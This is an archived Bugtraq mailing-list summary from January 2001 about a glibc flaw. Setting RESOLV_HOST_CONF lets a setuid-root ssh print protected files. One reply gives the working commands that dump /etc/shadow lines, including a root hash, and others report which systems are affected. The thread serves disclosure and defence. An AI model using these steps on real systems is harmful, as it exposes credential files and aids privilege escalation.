[18539] in bugtraq
Re: Glibc Local Root Exploit
daemon@ATHENA.MIT.EDU (Ben Greenbaum)
Wed Jan 10 21:00:58 2001
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.GSO.4.30.0101101741160.531-100000@mail>
Date: Wed, 10 Jan 2001 17:53:03 -0800
Reply-To: Ben Greenbaum <bgreenbaum@SECURITYFOCUS.COM>
From: Ben Greenbaum <bgreenbaum@SECURITYFOCUS.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Summary of responses:
----------------------------------
From: Jag <agrajag@linuxpower.org>
On Wed, 10 Jan 2001, Thomas T. Veldhouse wrote:
> This does not happen on my machine using glibc-2.2 and openssh-2.3.0p1
> following your example.
I have reproduced it with glibc-2.2 and openssh-2.3.0p1 The key is that
you must actually ssh to a valid host. If ssh can't resolve the host,
it won't display the contents of the file.
------------------------------------------------
From: Lukasz Trabinski <lukasz@lt.wsisiz.edu.pl>
On Wed, 10 Jan 2001, Thomas T. Veldhouse wrote:
> This does not happen on my machine using glibc-2.2 and openssh-2.3.0p1
> following your example.
Let's test it. :-)
[lukasz@lt lukasz]$ ls -all /usr/bin/ssh
-rwsr-xr-x 1 root root 176036 Jan 6 14:34 /usr/bin/ssh
[lukasz@lt lukasz]$ export RESOLV_HOST_CONF=/etc/shadow
[lukasz@lt lukasz]$ ssh lt
/etc/shadow: line 1: bad command
`root:$1$3qweG6dk$i1ZoWh6uqweiuaniVm1:11270:0:99999:7:::134537268'
/etc/shadow: line 2: bad command `bin:x:10679:0:99999:7:::'
/etc/shadow: line 3: bad command `daemon:x:10679:0:99999:7:::'
/etc/shadow: line 4: bad command `adm:x:10679:0:99999:7:::
Nice. :)
[lukasz@lt lukasz]$ rpm -q openssh
openssh-2.3.0p1-4
[lukasz@lt lukasz]$ rpm -q glibc
glibc-2.2-9
All was taken from RH updates.
[lukasz@lt lukasz]$ cat /etc/redhat-release
Red Hat Linux release 7.0 (Guinness)
but:
[lukasz@yyy lukasz]$ ll /usr/bin/ssh
-rwxr-xr-x 1 root root 176932 Nov 21 23:53 /usr/bin/ssh
[lukasz@xxx lukasz]$ ssh xxx
lukasz@xxx's password:
glibc 2.2-9 openssh-2.3.0, RH 7.0.
Sultion:
Only passwd needs setuid flag. :)
-------------------------------------------------------------------------
From: Alexander Schreiber <alexander.schreiber@informatik.tu-chemnitz.de>
Tested on Debian 2.2 (potato) with OpenSSH-1.2.3 and libc6 2.1.3: does
not work.
----------------------------------------------
From: Michael Devogelaere <michael@digibel.be>
It works on my system:
glibc 2.2 and openssh-2.3.0p1 (all latest updates from redhat)
(luckily enough i don't tolerate users on my system <grin>)
-----------------------------------------
From: elliptic <elliptic@cipherpunks.com>
Likewise, I can not reproduce this bug on Slackware Linux 7.0, which is
currently using glibc version 2.1.3. Additionally, this is the revision
of glibc included with Slackware 7.1, which would likely also not be
vulnerable.
------------------------------------------------------
From: Joseph Nicholas Yarbrough <nyarbrough@lurhq.com>
I am unable to reproduce this using slackware 7.1(glibc2.1.3).
What version of slackware were these "others" reporting positive results from?
------------------------------------------------
From: Lukasz Trabinski <lukasz@lt.wsisiz.edu.pl>
> [lukasz@lt lukasz]$ rpm -q openssh
> openssh-2.3.0p1-4
I have tested 1.5-1.2.30 (with ssh root setuid, too. We can read
/etc/shadow, too). :-)
------------------------------------------------
